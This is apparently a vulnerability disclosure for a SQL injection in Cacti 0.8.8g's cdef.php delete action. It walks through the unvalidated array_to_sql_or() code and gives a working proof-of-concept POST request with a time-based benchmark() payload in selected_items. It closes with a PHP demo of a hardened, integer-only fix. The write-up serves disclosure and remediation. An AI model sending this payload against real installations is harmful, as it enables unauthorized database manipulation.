Cacti 0.8.8g cdef.php selected_items SQL injection


The issue is in the form_actions() function in cdef.php. The delete branch (drp_action=1) passes the unserialized selected_items array straight into array_to_sql_or(); only the duplicate branch (drp_action=2) runs each item through input_validate_input_number() first:

function form_actions() {
    global $colors, $cdef_actions;

    /* if we are to save this form, instead of display it */
    if (isset($_POST["selected_items"])) {
        $selected_items = unserialize(stripslashes($_POST["selected_items"]));

        if ($_POST["drp_action"] == "1") { /* delete */
            /* $selected_items is used as-is here: no numeric check, no escaping */
            db_execute("delete from cdef where " . array_to_sql_or($selected_items, "id"));
            db_execute("delete from cdef_items where " . array_to_sql_or($selected_items, "cdef_id"));

        }elseif ($_POST["drp_action"] == "2") { /* duplicate */
            for ($i=0;($i<count($selected_items));$i++) {
                /* ================= input validation ================= */
                input_validate_input_number($selected_items[$i]);
                /* ==================================================== */

                duplicate_cdef($selected_items[$i], $_POST["title_format"]);
            }
        }

        header("Location: cdef.php");
        exit;
    }

Following array_to_sql_or() into /lib/database.php, we find that each element is wrapped in single quotes but never escaped or checked to be numeric, so a value containing a quote breaks out of the IN list:

function array_to_sql_or($array, $sql_column) {
    /* if the last item is null; pop it off */
    /* (curly-brace offset syntax, valid in the PHP 5 versions Cacti 0.8.8 ran on) */
    if ((empty($array{count($array)-1})) && (sizeof($array) > 1)) {
        array_pop($array);
    }

    if (count($array) > 0) {
        $sql_or = "($sql_column IN(";

        for ($i=0;($i<count($array));$i++) {
            if (is_array($array[$i]) && array_key_exists($sql_column, $array[$i])) {
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i][$sql_column] . "'";
            } else {
                /* user-controlled value concatenated straight into the SQL string */
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i] . "'";
            }
        }

        $sql_or .= "))";

        return $sql_or;
    }
}
Proof-of-concept request, sent with a valid Cacti session cookie:

POST /cdef.php?action=actions HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Cacti=fvb36noraocv8etfbrvokrle81
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

selected_items=a:1:{i:0;s:31:"',benchmark(10000000,sha1(1)),'";}&drp_action=1

What MySQL actually executes (shown for the second delete; the first delete against cdef is injected the same way) is the following, and the benchmark() call makes the resulting delay observable in the response time:

delete from cdef_items where (cdef_id IN('',benchmark(10000000,sha1(1)),''))
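As an added example (not Cacti's code), the script below reproduces the string building of array_to_sql_or() on the serialized payload from the request above, and places a hardened variant beside it that accepts only plain integer ids, so no quoting is needed and a quote in the input is rejected before it reaches the query. The function names array_to_sql_or_vulnerable and array_to_sql_or_hardened are assumptions made for this demonstration.

```php
<?php
// Added example, not part of the original post or of Cacti.
// Vulnerable builder: the same concatenation as Cacti's array_to_sql_or()
// for the scalar case (each element quoted, never escaped or type-checked).
function array_to_sql_or_vulnerable(array $array, string $sql_column): string
{
    $parts = [];
    foreach ($array as $item) {
        $parts[] = "'" . $item . "'";
    }
    return "($sql_column IN(" . implode(',', $parts) . "))";
}

// Hardened builder (assumed name): cdef.id / cdef_items.cdef_id are integer
// columns, so every id must be a plain decimal integer. Anything else,
// including the quote-bearing PoC string, is rejected with an exception.
function array_to_sql_or_hardened(array $array, string $sql_column): string
{
    $ids = [];
    foreach ($array as $item) {
        if (!is_int($item) && !is_string($item)) {
            throw new InvalidArgumentException('non-scalar id');
        }
        if (!preg_match('/^[0-9]+$/', (string) $item)) {
            throw new InvalidArgumentException('non-numeric id: ' . $item);
        }
        $ids[] = (int) $item;
    }
    if (count($ids) === 0) {
        throw new InvalidArgumentException('empty id list');
    }
    // The column name is a literal in Cacti's callers; restricting it to an
    // identifier keeps this helper safe if it is ever reused elsewhere.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $sql_column)) {
        throw new InvalidArgumentException('bad column name');
    }
    return "($sql_column IN(" . implode(',', $ids) . "))";
}

// Constructed input: the selected_items value from the PoC request, after
// the unserialize() call that form_actions() performs on it.
$payload = unserialize('a:1:{i:0;s:31:"\',benchmark(10000000,sha1(1)),\'";}');

echo "vulnerable: delete from cdef_items where "
   . array_to_sql_or_vulnerable($payload, 'cdef_id') . "\n";

try {
    array_to_sql_or_hardened($payload, 'cdef_id');
    echo "hardened: accepted (should not happen)\n";
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (" . $e->getMessage() . ")\n";
}

// Legitimate ids, as the form normally submits them, still work.
echo "hardened: delete from cdef_items where "
   . array_to_sql_or_hardened(['3', '17'], 'cdef_id') . "\n";
```

Run with php on the command line: the vulnerable builder emits the same statement MySQL executed above, the hardened builder throws on the PoC array, and a list of ordinary numeric ids produces an unquoted integer IN list. This is the same check input_validate_input_number() enforces in the duplicate branch, applied to the delete branch as well.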
